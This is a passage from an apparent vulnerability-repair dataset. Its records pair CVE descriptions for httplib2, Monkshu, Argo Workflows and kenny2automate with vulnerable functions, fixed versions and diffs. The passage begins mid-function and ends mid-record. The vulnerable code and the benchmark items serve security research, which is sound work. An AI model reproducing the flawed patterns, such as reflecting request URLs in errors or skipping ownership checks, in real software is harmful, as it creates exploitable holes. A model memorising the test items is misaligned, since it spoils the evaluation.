connection_type(\n authority, timeout=self.timeout, proxy_info=self.proxy_info\n )\n conn.set_debuglevel(debuglevel)\n\n if \"range\" not in headers and \"accept-encoding\" not in headers:\n headers[\"accept-encoding\"] = \"gzip, deflate\"\n\n info = email.message.Message()\n cachekey = None\n cached_value = None\n if self.cache:\n cachekey = defrag_uri\n cached_value = self.cache.get(cachekey)\n if cached_value:\n try:\n info, content = cached_value.split(b\"\\r\\n\\r\\n\", 1)\n info = email.message_from_bytes(info)\n for k, v in info.items():\n if v.startswith(\"=?\") and v.endswith(\"?=\"):\n info.replace_header(\n k, str(*email.header.decode_header(v)[0])\n )\n except (IndexError, ValueError):\n self.cache.delete(cachekey)\n cachekey = None\n cached_value = None\n\n if (\n method in self.optimistic_concurrency_methods\n and self.cache\n and \"etag\" in info\n and not self.ignore_etag\n and \"if-match\" not in headers\n ):\n # http://www.w3.org/1999/04/Editing/\n headers[\"if-match\"] = info[\"etag\"]\n\n # https://tools.ietf.org/html/rfc7234\n # A cache MUST invalidate the effective Request URI as well as [...] Location and Content-Location\n # when a non-error status code is received in response to an unsafe request method.\n if self.cache and cachekey and method not in self.safe_methods:\n self.cache.delete(cachekey)\n\n # Check the vary header in the cache to see if this request\n # matches what varies in the cache.\n if method in self.safe_methods and \"vary\" in info:\n vary = info[\"vary\"]\n vary_headers = vary.lower().replace(\" \", \"\").split(\",\")\n for header in vary_headers:\n key = \"-varied-%s\" % header\n value = info[key]\n if headers.get(header, None) != value:\n cached_value = None\n break\n\n if (\n self.cache\n and cached_value\n and (method in self.safe_methods or info[\"status\"] == \"308\")\n and \"range\" not in headers\n ):\n redirect_method = method\n if info[\"status\"] not in (\"307\", \"308\"):\n redirect_method = \"GET\"\n if \"-x-permanent-redirect-url\" in info:\n # Should cached permanent redirects be counted in our redirection count? For now, yes.\n if redirections <= 0:\n raise RedirectLimit(\n \"Redirected more times than redirection_limit allows.\",\n {},\n \"\",\n )\n (response, new_content) = self.request(\n info[\"-x-permanent-redirect-url\"],\n method=redirect_method,\n headers=headers,\n redirections=redirections - 1,\n )\n response.previous = Response(info)\n response.previous.fromcache = True\n else:\n # Determine our course of action:\n # Is the cached entry fresh or stale?\n # Has the client requested a non-cached response?\n #\n # There seems to be three possible answers:\n # 1. [FRESH] Return the cache entry w/o doing a GET\n # 2. [STALE] Do the GET (but add in cache validators if available)\n # 3. 
[TRANSPARENT] Do a GET w/o any cache validators (Cache-Control: no-cache) on the request\n entry_disposition = _entry_disposition(info, headers)\n\n if entry_disposition == \"FRESH\":\n if not cached_value:\n info[\"status\"] = \"504\"\n content = b\"\"\n response = Response(info)\n if cached_value:\n response.fromcache = True\n return (response, content)\n\n if entry_disposition == \"STALE\":\n if (\n \"etag\" in info\n and not self.ignore_etag\n and not \"if-none-match\" in headers\n ):\n headers[\"if-none-match\"] = info[\"etag\"]\n if \"last-modified\" in info and not \"last-modified\" in headers:\n headers[\"if-modified-since\"] = info[\"last-modified\"]\n elif entry_disposition == \"TRANSPARENT\":\n pass\n\n (response, new_content) = self._request(\n conn,\n authority,\n uri,\n request_uri,\n method,\n body,\n headers,\n redirections,\n cachekey,\n )\n\n if response.status == 304 and method == \"GET\":\n # Rewrite the cache entry with the new end-to-end headers\n # Take all headers that are in response\n # and overwrite their values in info.\n # unless they are hop-by-hop, or are listed in the connection header.\n\n for key in _get_end2end_headers(response):\n info[key] = response[key]\n merged_response = Response(info)\n if hasattr(response, \"_stale_digest\"):\n merged_response._stale_digest = response._stale_digest\n _updateCache(\n headers, merged_response, content, self.cache, cachekey\n )\n response = merged_response\n response.status = 200\n response.fromcache = True\n\n elif response.status == 200:\n content = new_content\n else:\n self.cache.delete(cachekey)\n content = new_content\n else:\n cc = _parse_cache_control(headers)\n if \"only-if-cached\" in cc:\n info[\"status\"] = \"504\"\n response = Response(info)\n content = b\"\"\n else:\n (response, content) = self._request(\n conn,\n authority,\n uri,\n request_uri,\n method,\n body,\n headers,\n redirections,\n cachekey,\n )\n except Exception as e:\n is_timeout = isinstance(e, socket.timeout)\n if is_timeout:\n conn = self.connections.pop(conn_key, None)\n if conn:\n conn.close()\n\n if self.force_exception_to_status_code:\n if isinstance(e, HttpLib2ErrorWithResponse):\n response = e.response\n content = e.content\n response.status = 500\n response.reason = str(e)\n elif isinstance(e, socket.timeout):\n content = b\"Request Timeout\"\n response = Response(\n {\n \"content-type\": \"text/plain\",\n \"status\": \"408\",\n \"content-length\": len(content),\n }\n )\n response.reason = \"Request Timeout\"\n else:\n content = str(e).encode(\"utf-8\")\n response = Response(\n {\n \"content-type\": \"text/plain\",\n \"status\": \"400\",\n \"content-length\": len(content),\n }\n )\n response.reason = \"Bad Request\"\n else:\n raise\n\n return (response, content)"}], "vul_patch": "--- a/python2/httplib2/__init__.py\n+++ b/python2/httplib2/__init__.py\n@@ -40,6 +40,9 @@\n headers[\"user-agent\"] = \"Python-httplib2/%s (gzip)\" % __version__\n \n uri = iri2uri(uri)\n+ # Prevent CWE-75 space injection to manipulate request via part of uri.\n+ # Prevent CWE-93 CRLF injection to modify headers via part of uri.\n+ uri = uri.replace(\" \", \"%20\").replace(\"\\r\", \"%0D\").replace(\"\\n\", \"%0A\")\n \n (scheme, authority, request_uri, defrag_uri) = urlnorm(uri)\n \n\n--- a/python3/httplib2/__init__.py\n+++ b/python3/httplib2/__init__.py\n@@ -39,6 +39,9 @@\n headers[\"user-agent\"] = \"Python-httplib2/%s (gzip)\" % __version__\n \n uri = iri2uri(uri)\n+ # Prevent CWE-75 space injection to manipulate request via part of uri.\n+ # Prevent 
CWE-93 CRLF injection to modify headers via part of uri.\n+ uri = uri.replace(\" \", \"%20\").replace(\"\\r\", \"%0D\").replace(\"\\n\", \"%0A\")\n \n (scheme, authority, request_uri, defrag_uri) = urlnorm(uri)\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-32812", "cve_description": "Monkshu is an enterprise application server for mobile apps (iOS and Android), responsive HTML 5 apps, and JSON API services. In version 2.90 and earlier, there is a reflected cross-site scripting vulnerability in frontend HTTP server. The attacker can send in a carefully crafted URL along with a known bug in the server which will cause a 500 error, and the response will then embed the URL provided by the hacker. The impact is moderate as the hacker must also be able to craft an HTTP request which should cause a 500 server error. None such requests are known as this point. The issue is patched in version 2.95. As a workaround, one may use a disk caching plugin.", "cwe_info": {"CWE-116": {"name": "Improper Encoding or Escaping of Output", "description": "The product prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved."}}, "repo": "https://github.com/TekMonksGitHub/monkshu", "patch_url": ["https://github.com/TekMonksGitHub/monkshu/commit/4601a9bfdc934d7ac32619ce621652fad0cf452b"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_284_1", "commit": "c83fde7f212aa049f8f3028f15d9ed4083e77dee", "file_path": "frontend/server/server.js", "start_line": 122, "end_line": 144, "snippet": "function _sendFile(fileRequested, req, res, stats) {\n\tfs.open(fileRequested, \"r\", (err, fd) => {\t\n\t\tif (err) (err.code === \"ENOENT\") ? _sendError(req, res, 404, \"Path Not Found.\") : _sendError(req, res, 500, err);\n\t\telse {\n\t\t\taccess.info(`Sending: ${fileRequested}`);\n\t\t\tconst mime = conf.mimeTypes[path.extname(fileRequested)];\n\t\t\tconst rawStream = fs.createReadStream(null, {\"flags\":\"r\",\"fd\":fd,\"autoClose\":true});\n\t\t\tconst acceptEncodingHeader = req.headers[\"accept-encoding\"] || \"\";\n\n\t\t\tif (conf.enableGZIPEncoding && acceptEncodingHeader.includes(\"gzip\") && mime && (!Array.isArray(mime) || Array.isArray(mime) && mime[1]) ) {\n\t\t\t\tres.writeHead(200, _getServerHeaders({ \"Content-Type\": Array.isArray(mime)?mime[0]:mime, \"Content-Encoding\": \"gzip\" }, stats));\n\t\t\t\trawStream.pipe(zlib.createGzip()).pipe(res)\n\t\t\t\t.on(\"error\", err => _sendError(req, res, 500, `500: ${req.url}, Server error: ${err}`))\n\t\t\t\t.on(\"end\", _ => res.end());\n\t\t\t} else {\n\t\t\t\tres.writeHead(200, mime ? _getServerHeaders({\"Content-Type\":Array.isArray(mime)?mime[0]:mime}, stats) : _getServerHeaders({}, stats));\n\t\t\t\trawStream.on(\"data\", chunk => res.write(chunk, \"binary\"))\n\t\t\t\t\t.on(\"error\", err => _sendError(req, res, 500, `500: ${req.url}, Server error: ${err}`))\n\t\t\t\t\t.on(\"end\", _ => res.end());\n\t\t\t}\n\t\t}\n\t});\n}"}], "fix_func": [{"id": "fix_js_284_1", "commit": "4601a9bfdc934d7ac32619ce621652fad0cf452b", "file_path": "frontend/server/server.js", "start_line": 122, "end_line": 144, "snippet": "function _sendFile(fileRequested, req, res, stats) {\n\tfs.open(fileRequested, \"r\", (err, fd) => {\t\n\t\tif (err) (err.code === \"ENOENT\") ? 
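
For the CVE-2020-11078 record that closes on this line: the three replace() calls added to both the Python 2 and Python 3 request() methods are the entire fix, percent-encoding the characters that let a caller-concatenated URI break out of the request line (space) or inject extra header lines (CR/LF). A short standalone demonstration (the driver around it is illustrative; the substitution is verbatim from the patch):

    def neutralize_uri(uri: str) -> str:
        # Verbatim substitution from the httplib2 0.18.0 fix above.
        return uri.replace(" ", "%20").replace("\r", "%0D").replace("\n", "%0A")

    # A URI assembled by naive string concatenation with attacker input:
    tainted = "http://host.example/a\r\nX-Evil: 1\r\n\r\nGET /hidden HTTP/1.1"
    print(neutralize_uri(tainted))
    # http://host.example/a%0D%0AX-Evil:%201%0D%0A%0D%0AGET%20/hidden%20HTTP/1.1
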
_sendError(req, res, 404, \"Path Not Found.\") : _sendError(req, res, 500, err);\n\t\telse {\n\t\t\taccess.info(`Sending: ${fileRequested}`);\n\t\t\tconst mime = conf.mimeTypes[path.extname(fileRequested)];\n\t\t\tconst rawStream = fs.createReadStream(null, {\"flags\":\"r\",\"fd\":fd,\"autoClose\":true});\n\t\t\tconst acceptEncodingHeader = req.headers[\"accept-encoding\"] || \"\";\n\n\t\t\tif (conf.enableGZIPEncoding && acceptEncodingHeader.includes(\"gzip\") && mime && (!Array.isArray(mime) || Array.isArray(mime) && mime[1]) ) {\n\t\t\t\tres.writeHead(200, _getServerHeaders({ \"Content-Type\": Array.isArray(mime)?mime[0]:mime, \"Content-Encoding\": \"gzip\" }, stats));\n\t\t\t\trawStream.pipe(zlib.createGzip()).pipe(res)\n\t\t\t\t.on(\"error\", err => _sendError(req, res, 500, `500: Error: ${err}`))\n\t\t\t\t.on(\"end\", _ => res.end());\n\t\t\t} else {\n\t\t\t\tres.writeHead(200, mime ? _getServerHeaders({\"Content-Type\":Array.isArray(mime)?mime[0]:mime}, stats) : _getServerHeaders({}, stats));\n\t\t\t\trawStream.on(\"data\", chunk => res.write(chunk, \"binary\"))\n\t\t\t\t\t.on(\"error\", err => _sendError(req, res, 500, `500: Error: ${err}`))\n\t\t\t\t\t.on(\"end\", _ => res.end());\n\t\t\t}\n\t\t}\n\t});\n}"}], "vul_patch": "--- a/frontend/server/server.js\n+++ b/frontend/server/server.js\n@@ -10,12 +10,12 @@\n \t\t\tif (conf.enableGZIPEncoding && acceptEncodingHeader.includes(\"gzip\") && mime && (!Array.isArray(mime) || Array.isArray(mime) && mime[1]) ) {\n \t\t\t\tres.writeHead(200, _getServerHeaders({ \"Content-Type\": Array.isArray(mime)?mime[0]:mime, \"Content-Encoding\": \"gzip\" }, stats));\n \t\t\t\trawStream.pipe(zlib.createGzip()).pipe(res)\n-\t\t\t\t.on(\"error\", err => _sendError(req, res, 500, `500: ${req.url}, Server error: ${err}`))\n+\t\t\t\t.on(\"error\", err => _sendError(req, res, 500, `500: Error: ${err}`))\n \t\t\t\t.on(\"end\", _ => res.end());\n \t\t\t} else {\n \t\t\t\tres.writeHead(200, mime ? _getServerHeaders({\"Content-Type\":Array.isArray(mime)?mime[0]:mime}, stats) : _getServerHeaders({}, stats));\n \t\t\t\trawStream.on(\"data\", chunk => res.write(chunk, \"binary\"))\n-\t\t\t\t\t.on(\"error\", err => _sendError(req, res, 500, `500: ${req.url}, Server error: ${err}`))\n+\t\t\t\t\t.on(\"error\", err => _sendError(req, res, 500, `500: Error: ${err}`))\n \t\t\t\t\t.on(\"end\", _ => res.end());\n \t\t\t}\n \t\t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-29164", "cve_description": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. In affected versions an attacker can create a workflow which produces a HTML artifact containing an HTML file that contains a script which uses XHR calls to interact with the Argo Server API. The attacker emails the deep-link to the artifact to their victim. The victim opens the link, the script starts running. As the script has access to the Argo Server API (as the victim), so may read information about the victim\u2019s workflows, or create and delete workflows. Note the attacker must be an insider: they must have access to the same cluster as the victim and must already be able to run their own workflows. The attacker must have an understanding of the victim\u2019s system. We have seen no evidence of this in the wild. 
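
For the CVE-2021-32812 record that closes on this line: the entire fix is dropping ${req.url} from the two 500-error messages, so attacker-controlled URLs are never reflected into the response body. A sketch of the same rule in Python (names are illustrative), including the escape-first variant for cases where some request context genuinely must be shown:

    import html
    from typing import Optional

    def render_500(err: Exception, request_url: Optional[str] = None) -> str:
        """Build a 500 body without reflecting raw request data.

        Like the Monkshu patch, the default message omits the URL entirely;
        if context is truly needed, HTML-escape it so markup stays inert.
        """
        body = "500: Error: " + html.escape(str(err))
        if request_url is not None:
            body += " (path: " + html.escape(request_url) + ")"
        return body

    print(render_500(ValueError("boom"), '/x"><script>alert(1)</script>'))
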
We urge all users to upgrade to the fixed versions.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/argoproj/argo-workflows", "patch_url": ["https://github.com/argoproj/argo-workflows/commit/87470e1c2bf703a9110e97bb755614ce8757fdcc"], "programing_language": "Go", "vul_func": [{"id": "vul_go_267_1", "commit": "61b80c90fd93aebff26df73fcddffa75732d10ec", "file_path": "server/apiserver/argoserver.go", "start_line": 297, "end_line": 367, "snippet": "func (as *argoServer) newHTTPServer(ctx context.Context, port int, artifactServer *artifacts.ArtifactServer) *http.Server {\n\tendpoint := fmt.Sprintf(\"localhost:%d\", port)\n\n\tmux := http.NewServeMux()\n\thttpServer := http.Server{\n\t\tAddr: endpoint,\n\t\tHandler: accesslog.Interceptor(mux),\n\t\tTLSConfig: as.tlsConfig,\n\t}\n\tdialOpts := []grpc.DialOption{\n\t\tgrpc.WithDefaultCallOptions(grpc.MaxCallRecvMsgSize(MaxGRPCMessageSize)),\n\t}\n\tif as.tlsConfig != nil {\n\t\tdialOpts = append(dialOpts, grpc.WithTransportCredentials(credentials.NewTLS(as.tlsConfig)))\n\t} else {\n\t\tdialOpts = append(dialOpts, grpc.WithTransportCredentials(insecure.NewCredentials()))\n\t}\n\n\twebhookInterceptor := webhook.Interceptor(as.clients.Kubernetes)\n\n\t// HTTP 1.1+JSON Server\n\t// grpc-ecosystem/grpc-gateway is used to proxy HTTP requests to the corresponding gRPC call\n\t// NOTE: if a marshaller option is not supplied, grpc-gateway will default to the jsonpb from\n\t// golang/protobuf. Which does not support types such as time.Time. gogo/protobuf does support\n\t// time.Time, but does not support custom UnmarshalJSON() and MarshalJSON() methods. 
Therefore\n\t// we use our own Marshaler\n\tgwMuxOpts := runtime.WithMarshalerOption(runtime.MIMEWildcard, new(json.JSONMarshaler))\n\tgwmux := runtime.NewServeMux(gwMuxOpts,\n\t\truntime.WithIncomingHeaderMatcher(func(key string) (string, bool) { return key, true }),\n\t\truntime.WithProtoErrorHandler(runtime.DefaultHTTPProtoErrorHandler),\n\t)\n\tmustRegisterGWHandler(infopkg.RegisterInfoServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(eventpkg.RegisterEventServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(eventsourcepkg.RegisterEventSourceServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(sensorpkg.RegisterSensorServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(pipelinepkg.RegisterPipelineServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(workflowpkg.RegisterWorkflowServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(workflowtemplatepkg.RegisterWorkflowTemplateServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(cronworkflowpkg.RegisterCronWorkflowServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(workflowarchivepkg.RegisterArchivedWorkflowServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(clusterwftemplatepkg.RegisterClusterWorkflowTemplateServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\n\tmux.HandleFunc(\"/api/\", func(w http.ResponseWriter, r *http.Request) {\n\t\t// we must delete this header for API request to prevent \"stream terminated by RST_STREAM with error code: PROTOCOL_ERROR\" error\n\t\tr.Header.Del(\"Connection\")\n\t\twebhookInterceptor(w, r, gwmux)\n\t})\n\tmux.HandleFunc(\"/artifacts/\", artifactServer.GetOutputArtifact)\n\tmux.HandleFunc(\"/input-artifacts/\", artifactServer.GetInputArtifact)\n\tmux.HandleFunc(\"/artifacts-by-uid/\", artifactServer.GetOutputArtifactByUID)\n\tmux.HandleFunc(\"/input-artifacts-by-uid/\", artifactServer.GetInputArtifactByUID)\n\tmux.HandleFunc(\"/artifact-files/\", artifactServer.GetArtifactFile)\n\tmux.Handle(\"/oauth2/redirect\", handlers.ProxyHeaders(http.HandlerFunc(as.oAuth2Service.HandleRedirect)))\n\tmux.Handle(\"/oauth2/callback\", handlers.ProxyHeaders(http.HandlerFunc(as.oAuth2Service.HandleCallback)))\n\tmux.HandleFunc(\"/metrics\", func(w http.ResponseWriter, r *http.Request) {\n\t\tif os.Getenv(\"ARGO_SERVER_METRICS_AUTH\") != \"false\" {\n\t\t\theader := metadata.New(map[string]string{\"authorization\": r.Header.Get(\"Authorization\")})\n\t\t\tctx := metadata.NewIncomingContext(context.Background(), header)\n\t\t\tif _, err := as.gatekeeper.Context(ctx); err != nil {\n\t\t\t\tlog.WithError(err).Error(\"failed to authenticate /metrics endpoint\")\n\t\t\t\tw.WriteHeader(403)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t\tpromhttp.Handler().ServeHTTP(w, r)\n\n\t})\n\t// we only enable HTST if we are secure mode, otherwise you would never be able access the UI\n\tmux.HandleFunc(\"/\", static.NewFilesServer(as.baseHRef, as.tlsConfig != nil && as.hsts, as.xframeOptions, as.accessControlAllowOrigin).ServerFiles)\n\treturn &httpServer\n}"}], "fix_func": [{"id": "fix_go_267_1", "commit": "87470e1c2bf703a9110e97bb755614ce8757fdcc", "file_path": "server/apiserver/argoserver.go", "start_line": 297, "end_line": 371, "snippet": "func (as *argoServer) newHTTPServer(ctx context.Context, port int, artifactServer 
*artifacts.ArtifactServer) *http.Server {\n\tendpoint := fmt.Sprintf(\"localhost:%d\", port)\n\n\tmux := http.NewServeMux()\n\thttpServer := http.Server{\n\t\tAddr: endpoint,\n\t\tHandler: accesslog.Interceptor(mux),\n\t\tTLSConfig: as.tlsConfig,\n\t}\n\tdialOpts := []grpc.DialOption{\n\t\tgrpc.WithDefaultCallOptions(grpc.MaxCallRecvMsgSize(MaxGRPCMessageSize)),\n\t}\n\tif as.tlsConfig != nil {\n\t\tdialOpts = append(dialOpts, grpc.WithTransportCredentials(credentials.NewTLS(as.tlsConfig)))\n\t} else {\n\t\tdialOpts = append(dialOpts, grpc.WithTransportCredentials(insecure.NewCredentials()))\n\t}\n\n\twebhookInterceptor := webhook.Interceptor(as.clients.Kubernetes)\n\n\t// HTTP 1.1+JSON Server\n\t// grpc-ecosystem/grpc-gateway is used to proxy HTTP requests to the corresponding gRPC call\n\t// NOTE: if a marshaller option is not supplied, grpc-gateway will default to the jsonpb from\n\t// golang/protobuf. Which does not support types such as time.Time. gogo/protobuf does support\n\t// time.Time, but does not support custom UnmarshalJSON() and MarshalJSON() methods. Therefore\n\t// we use our own Marshaler\n\tgwMuxOpts := runtime.WithMarshalerOption(runtime.MIMEWildcard, new(json.JSONMarshaler))\n\tgwmux := runtime.NewServeMux(gwMuxOpts,\n\t\truntime.WithIncomingHeaderMatcher(func(key string) (string, bool) { return key, true }),\n\t\truntime.WithProtoErrorHandler(runtime.DefaultHTTPProtoErrorHandler),\n\t)\n\tmustRegisterGWHandler(infopkg.RegisterInfoServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(eventpkg.RegisterEventServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(eventsourcepkg.RegisterEventSourceServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(sensorpkg.RegisterSensorServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(pipelinepkg.RegisterPipelineServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(workflowpkg.RegisterWorkflowServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(workflowtemplatepkg.RegisterWorkflowTemplateServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(cronworkflowpkg.RegisterCronWorkflowServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(workflowarchivepkg.RegisterArchivedWorkflowServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(clusterwftemplatepkg.RegisterClusterWorkflowTemplateServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\n\tmux.HandleFunc(\"/api/\", func(w http.ResponseWriter, r *http.Request) {\n\t\t// we must delete this header for API request to prevent \"stream terminated by RST_STREAM with error code: PROTOCOL_ERROR\" error\n\t\tr.Header.Del(\"Connection\")\n\t\twebhookInterceptor(w, r, gwmux)\n\t})\n\n\t// emergency environment variable that allows you to disable the artifact service in case of problems\n\tif os.Getenv(\"ARGO_ARTIFACT_SERVER\") != \"false\" {\n\t\tmux.HandleFunc(\"/artifacts/\", artifactServer.GetOutputArtifact)\n\t\tmux.HandleFunc(\"/input-artifacts/\", artifactServer.GetInputArtifact)\n\t\tmux.HandleFunc(\"/artifacts-by-uid/\", artifactServer.GetOutputArtifactByUID)\n\t\tmux.HandleFunc(\"/input-artifacts-by-uid/\", artifactServer.GetInputArtifactByUID)\n\t\tmux.HandleFunc(\"/artifact-files/\", artifactServer.GetArtifactFile)\n\t}\n\tmux.Handle(\"/oauth2/redirect\", 
handlers.ProxyHeaders(http.HandlerFunc(as.oAuth2Service.HandleRedirect)))\n\tmux.Handle(\"/oauth2/callback\", handlers.ProxyHeaders(http.HandlerFunc(as.oAuth2Service.HandleCallback)))\n\tmux.HandleFunc(\"/metrics\", func(w http.ResponseWriter, r *http.Request) {\n\t\tif os.Getenv(\"ARGO_SERVER_METRICS_AUTH\") != \"false\" {\n\t\t\theader := metadata.New(map[string]string{\"authorization\": r.Header.Get(\"Authorization\")})\n\t\t\tctx := metadata.NewIncomingContext(context.Background(), header)\n\t\t\tif _, err := as.gatekeeper.Context(ctx); err != nil {\n\t\t\t\tlog.WithError(err).Error(\"failed to authenticate /metrics endpoint\")\n\t\t\t\tw.WriteHeader(403)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t\tpromhttp.Handler().ServeHTTP(w, r)\n\n\t})\n\t// we only enable HTST if we are secure mode, otherwise you would never be able access the UI\n\tmux.HandleFunc(\"/\", static.NewFilesServer(as.baseHRef, as.tlsConfig != nil && as.hsts, as.xframeOptions, as.accessControlAllowOrigin).ServerFiles)\n\treturn &httpServer\n}"}], "vul_patch": "--- a/server/apiserver/argoserver.go\n+++ b/server/apiserver/argoserver.go\n@@ -45,11 +45,15 @@\n \t\tr.Header.Del(\"Connection\")\n \t\twebhookInterceptor(w, r, gwmux)\n \t})\n-\tmux.HandleFunc(\"/artifacts/\", artifactServer.GetOutputArtifact)\n-\tmux.HandleFunc(\"/input-artifacts/\", artifactServer.GetInputArtifact)\n-\tmux.HandleFunc(\"/artifacts-by-uid/\", artifactServer.GetOutputArtifactByUID)\n-\tmux.HandleFunc(\"/input-artifacts-by-uid/\", artifactServer.GetInputArtifactByUID)\n-\tmux.HandleFunc(\"/artifact-files/\", artifactServer.GetArtifactFile)\n+\n+\t// emergency environment variable that allows you to disable the artifact service in case of problems\n+\tif os.Getenv(\"ARGO_ARTIFACT_SERVER\") != \"false\" {\n+\t\tmux.HandleFunc(\"/artifacts/\", artifactServer.GetOutputArtifact)\n+\t\tmux.HandleFunc(\"/input-artifacts/\", artifactServer.GetInputArtifact)\n+\t\tmux.HandleFunc(\"/artifacts-by-uid/\", artifactServer.GetOutputArtifactByUID)\n+\t\tmux.HandleFunc(\"/input-artifacts-by-uid/\", artifactServer.GetInputArtifactByUID)\n+\t\tmux.HandleFunc(\"/artifact-files/\", artifactServer.GetArtifactFile)\n+\t}\n \tmux.Handle(\"/oauth2/redirect\", handlers.ProxyHeaders(http.HandlerFunc(as.oAuth2Service.HandleRedirect)))\n \tmux.Handle(\"/oauth2/callback\", handlers.ProxyHeaders(http.HandlerFunc(as.oAuth2Service.HandleCallback)))\n \tmux.HandleFunc(\"/metrics\", func(w http.ResponseWriter, r *http.Request) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-22452", "cve_description": "kenny2automate is a Discord bot. In the web interface for server settings, form elements were generated with Discord channel IDs as part of input names. Prior to commit a947d7c, no validation was performed to ensure that the channel IDs submitted actually belonged to the server being configured. Thus anyone who has access to the channel ID they wish to change settings for and the server settings panel for any server could change settings for the requested channel no matter which server it belonged to. Commit a947d7c resolves the issue and has been deployed to the official instance of the bot. The only workaround that exists is to disable the web config entirely by changing it to run on localhost. 
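CVE-2022-29164's patch does not remove the artifact routes; it gates their registration behind `ARGO_ARTIFACT_SERVER != "false"` as an emergency kill switch. A sketch of the same pattern in a hypothetical Flask service (route, handler, and variable name are all illustrative):

```python
import os
from flask import Flask

app = Flask(__name__)

def get_artifact(name):
    return f"artifact {name}"  # stand-in handler

# Emergency escape hatch: operators can turn the whole feature off with
# one environment variable if an exploit is found before a patch ships.
if os.getenv("ARTIFACT_SERVER") != "false":
    app.add_url_rule("/artifacts/<path:name>", "artifacts", get_artifact)
```

Defaulting to enabled keeps behavior unchanged for existing deployments while still giving operators an immediate mitigation.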
Note that a workaround is only necessary for those who run their own instance of the bot.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/Kenny2github/kenny2automate", "patch_url": ["https://github.com/Kenny2github/kenny2automate/commit/a947d7ce408687b587c7e6dfd6026f7c4ee31ac2"], "programing_language": "Python", "vul_func": [{"id": "vul_py_249_1", "commit": "a5e1ac9", "file_path": "kenny2automate/server/__init__.py", "start_line": 551, "end_line": 593, "snippet": " async def save_server(self, request):\n await self.elg(request)\n guild = self.bot.get_guild(int(request.match_info.get('server', '0')))\n if guild is None:\n self.notfound()\n if not guild.get_member(\n int(self.getsesh(request)['client']['id'])\n ).guild_permissions.administrator:\n self.notfound()\n data = await request.post()\n params = []\n otherparams = {}\n for k in data.keys():\n if not k.startswith('channel-'):\n otherparams[k] = ','.join(data.getall(k))\n continue\n param = {'channel_id': int(k[len('channel-'):])}\n for v in data.getall(k):\n v = v.partition('=')\n if v[0] == 'ping':\n if 'ping' not in param:\n param['ping'] = set()\n param['ping'].add(v[-1])\n else:\n param[v[0]] = v[-1] or None\n param['ping'] = '|'.join(param.get('ping', ())) or None\n params.append(param)\n otherparams['guild_id'] = guild.id\n try:\n with self.db.connection:\n self.db.executemany(\n 'UPDATE channels SET lang=:lang, games_ping=:ping \\\nWHERE channel_id=:channel_id',\n params\n )\n self.db.execute(\n 'UPDATE guilds SET guild_disabled_commands=:disable_cmd, \\\nguild_disabled_cogs=:disable_cog, words_censor=:words_censor WHERE guild_id=:guild_id',\n otherparams\n )\n except sql.ProgrammingError as exc:\n raise web.HTTPBadRequest(reason=str(exc))\n raise web.HTTPSeeOther(request.path)"}], "fix_func": [{"id": "fix_py_249_1", "commit": "a947d7c", "file_path": "kenny2automate/server/__init__.py", "start_line": 551, "end_line": 596, "snippet": " async def save_server(self, request):\n await self.elg(request)\n guild = self.bot.get_guild(int(request.match_info.get('server', '0')))\n if guild is None:\n self.notfound()\n if not guild.get_member(\n int(self.getsesh(request)['client']['id'])\n ).guild_permissions.administrator:\n self.notfound()\n data = await request.post()\n params = []\n otherparams = {}\n for k in data.keys():\n if not k.startswith('channel-'):\n otherparams[k] = ','.join(data.getall(k))\n continue\n param = {'channel_id': int(k[len('channel-'):])}\n for v in data.getall(k):\n v = v.partition('=')\n if v[0] == 'ping':\n if 'ping' not in param:\n param['ping'] = set()\n param['ping'].add(v[-1])\n else:\n param[v[0]] = v[-1] or None\n param['ping'] = '|'.join(param.get('ping', ())) or None\n 